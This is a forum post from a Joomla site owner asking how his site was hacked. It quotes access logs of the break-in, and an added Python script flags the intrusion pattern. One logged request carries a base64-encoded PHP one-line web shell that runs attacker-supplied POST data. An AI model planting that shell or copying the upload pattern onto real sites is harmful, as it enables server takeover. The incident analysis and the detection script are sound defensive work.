Hello,

my old Joomla site has been hacked.
It happened in several stages:
they placed in the /images folder
jlogo.php.jpg
jlogo.php

Then these files were called and scattered other infected files all over the site...

I'm trying to understand how they managed to place these files...
In the server log file I think I can see (I'm just discovering how to read logs) that they logged in to the administration page very quickly (3 attempts); after that they grabbed the server info and config. Then they installed their gear.

Code:
185.93.187.66 - - [14/Aug/2016:15:24:45 +0200] "GET /administrator/ HTTP/1.0" 200 4693 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:24:45 +0200] "GET /administrator/ HTTP/1.0" 200 4693 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:24:45 +0200] "GET /administrator/ HTTP/1.0" 200 32750 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:24:46 +0200] "GET /administrator/?option=com_config HTTP/1.0" 200 62319 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:24:47 +0200] "GET /administrator/?option=com_admin&task=sysinfo HTTP/1.0" 200 84748 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:24:47 +0200] "GET /administrator/?option=com_installer HTTP/1.0" 200 21051 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:24:48 +0200] "POST /administrator/ HTTP/1.0" 200 21385 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:24:48 +0200] "POST /templates/jtemplate/jtemplate.php HTTP/1.0" 200 37031 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:24:49 +0200] "GET /administrator/?option=com_installer HTTP/1.0" 200 21051 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:24:50 +0200] "POST /administrator/ HTTP/1.0" 200 21385 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:24:50 +0200] "POST /modules/mod_jmodule/mod_jmodule.php HTTP/1.0" 200 37035 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:24:51 +0200] "GET /administrator/?option=com_installer HTTP/1.0" 200 21051 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:24:51 +0200] "POST /administrator/ HTTP/1.0" 200 21385 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:24:52 +0200] "POST /plugins/jplugin/jplugin.php HTTP/1.0" 200 37032 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:24:53 +0200] "GET /administrator/?option=com_installer HTTP/1.0" 200 21051 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:24:53 +0200] "POST /administrator/ HTTP/1.0" 200 21385 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:24:54 +0200] "POST /administrator/templates/jtemplate/jtemplate.php HTTP/1.0" 200 37098 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:24:55 +0200] "GET /administrator/?option=com_installer HTTP/1.0" 200 21051 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:24:55 +0200] "POST /administrator/ HTTP/1.0" 200 21385 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:24:56 +0200] "POST /administrator/modules/mod_jmodule/mod_jmodule.php HTTP/1.0" 200 37093 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:24:57 +0200] "GET /administrator/?option=com_installer HTTP/1.0" 200 21051 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:24:57 +0200] "POST /administrator/ HTTP/1.0" 200 21602 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:24:58 +0200] "POST /tmp/plain;base64,PD9waHAgQGFzc2VydChAYmFzZTY0X2RlY29kZShAc3RyX3JvdDEzKCRfUE9TVFsiZGF0YSJdKSkpOz8+;.php HTTP/1.0" 200 37271 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:24:58 +0200] "GET /administrator/?option=com_media HTTP/1.0" 200 32779 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:24:59 +0200] "POST /administrator/ HTTP/1.0" 200 1730 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:25:00 +0200] "POST /images/jlogo.php. HTTP/1.0" 404 281 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:25:00 +0200] "POST /images/jlogo.php HTTP/1.0" 200 36994 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:25:01 +0200] "GET /administrator/?option=com_media HTTP/1.0" 200 32779 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:25:01 +0200] "POST /administrator/ HTTP/1.0" 200 1687 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:25:02 +0200] "POST /images/jlogo.php.jpg HTTP/1.0" 200 3131 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:25:02 +0200] "GET /administrator/?option=com_config HTTP/1.0" 200 62319 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:25:02 +0200] "POST /administrator/ HTTP/1.0" 301 - "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:25:03 +0200] "GET /administrator/index.php HTTP/1.0" 200 32931 "http://pxxxx.phpnet.org/administrator/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:25:04 +0200] "GET /administrator/?option=com_media HTTP/1.0" 200 32779 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:25:05 +0200] "POST /administrator/ HTTP/1.0" 200 1687 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
185.93.187.66 - - [14/Aug/2016:15:25:05 +0200] "POST /images/jlogo.php HTTP/1.0" 200 10 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
They got in very fast, didn't they? Only on the 3rd attempt, is that how you read it too?
Code:
GET /administrator/ HTTP/1.0" 200 32750
The others only returned 4693 bytes; 32750 on the 3rd.
But maybe I'm wrong...

Thanks for your insight!
Paul
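As an added example (not part of Paul's post, and not Joomla's own tooling), here is a small Python triage script that applies the reading above to a log in the Apache combined format. It flags: the GET /administrator/ response whose body size jumps compared with the earlier ones from the same client (the login form versus the control panel; note that in the quoted excerpt no POST precedes the larger response, so the script only marks the size change, not the login itself); access to com_installer by that client; 200 responses to a PHP script requested directly under /images, /tmp, /templates, /modules or /plugins, where Joomla never serves scripts; double extensions such as jlogo.php.jpg; and URLs carrying a base64 run that decodes to PHP source, as the /tmp/plain;base64,... request does. The sample lines, the 203.0.113.5 address (an RFC 5737 documentation address), the PHP blob, and the function names and the 2x size threshold are all constructed for this example.

```python
"""Triage of an Apache combined-format access log after a suspected Joomla
back-end compromise. Added example, not code from the original post; the
sample lines below are constructed to mirror the shape of the quoted log."""
import base64
import binascii
import re
from collections import defaultdict

# One line of the Apache "combined" format, as in the post's excerpt.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Directories where Joomla never serves a PHP script directly; a 200 on a
# .php file there is a dropped file, not the CMS entry point (index.php).
CONTENT_DIRS = ("/images/", "/tmp/", "/templates/", "/modules/", "/plugins/",
                "/administrator/templates/", "/administrator/modules/")
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def parse(line):
    """Fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
    return rec


def decodes_to_php(path):
    """True if a base64-looking run inside the URL decodes to PHP source."""
    for blob in B64_RE.findall(path):
        try:
            raw = base64.b64decode(blob + "=" * (-len(blob) % 4))
        except (binascii.Error, ValueError):
            continue
        if raw.lstrip().startswith(b"<?php"):
            return True
    return False


def triage(lines):
    """Walk the log in order; return (timestamp, ip, tag, path) findings."""
    findings = []
    admin_sizes = defaultdict(list)  # ip -> body sizes of GET /administrator/
    logged_in = set()                # ips whose back-end landing page changed size
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ip, path, method, status = rec["ip"], rec["path"], rec["method"], rec["status"]
        tags = []
        # 1. Same URL, much larger body: the login form became the control panel.
        if method == "GET" and path.rstrip("/") == "/administrator" and status == "200":
            baseline = [s for s in admin_sizes[ip] if s > 0]
            if baseline and rec["size"] > 2 * min(baseline):
                tags.append("admin-login-succeeded")
                logged_in.add(ip)
            admin_sizes[ip].append(rec["size"])
        # 2. Extension installer opened by a client already flagged as logged in.
        if "option=com_installer" in path and ip in logged_in:
            tags.append("installer-access")
        # 3. A script executed (200) from a directory that should only hold content.
        if status == "200" and ".php" in path and path.startswith(CONTENT_DIRS):
            tags.append("direct-php-in-content-dir")
        # 4. Double extension such as jlogo.php.jpg: named to look like an image.
        if re.search(r"\.php\.[a-z0-9]+$", path, re.IGNORECASE):
            tags.append("double-extension")
        # 5. A base64 run in the URL that is really PHP source.
        if decodes_to_php(path):
            tags.append("php-source-in-path")
        findings.extend((rec["ts"], ip, tag, path) for tag in tags)
    return findings


# Constructed sample: 203.0.113.5 is an RFC 5737 documentation address.
UA = "Mozilla/5.0 (constructed)"
PHP_BLOB = base64.b64encode(b"<?php /* constructed */ ?>").decode()


def _line(ts, method, path, status, size):
    return (f'203.0.113.5 - - [{ts} +0200] "{method} {path} HTTP/1.0" '
            f'{status} {size} "-" "{UA}"')


SAMPLE_LOG = [
    _line("14/Aug/2016:15:24:45", "GET", "/administrator/", 200, 4693),
    _line("14/Aug/2016:15:24:45", "GET", "/administrator/", 200, 4693),
    _line("14/Aug/2016:15:24:45", "GET", "/administrator/", 200, 32750),
    _line("14/Aug/2016:15:24:47", "GET", "/administrator/?option=com_installer", 200, 21051),
    _line("14/Aug/2016:15:24:48", "POST", "/templates/jtemplate/jtemplate.php", 200, 37031),
    _line("14/Aug/2016:15:24:58", "POST", f"/tmp/plain;base64,{PHP_BLOB};.php", 200, 37271),
    _line("14/Aug/2016:15:25:00", "POST", "/images/jlogo.php.", 404, 281),
    _line("14/Aug/2016:15:25:02", "POST", "/images/jlogo.php.jpg", 200, 3131),
    _line("14/Aug/2016:15:25:10", "GET", "/index.php?option=com_content", 200, 12000),
]

if __name__ == "__main__":
    for ts, ip, tag, path in triage(SAMPLE_LOG):
        print(f"{ts}  {ip}  {tag:26s} {path}")
```

Run against the real access log, `triage(open("access.log").read().splitlines())` gives a tagged timeline per client; the size-jump rule is a heuristic (any back-end page that changes size will trip it), so the tags are leads to read in context, not verdicts. Rules 3 to 5 are the ones worth keeping as standing alerts, since a 200 on a PHP file under /images or /tmp has no legitimate cause on a Joomla site.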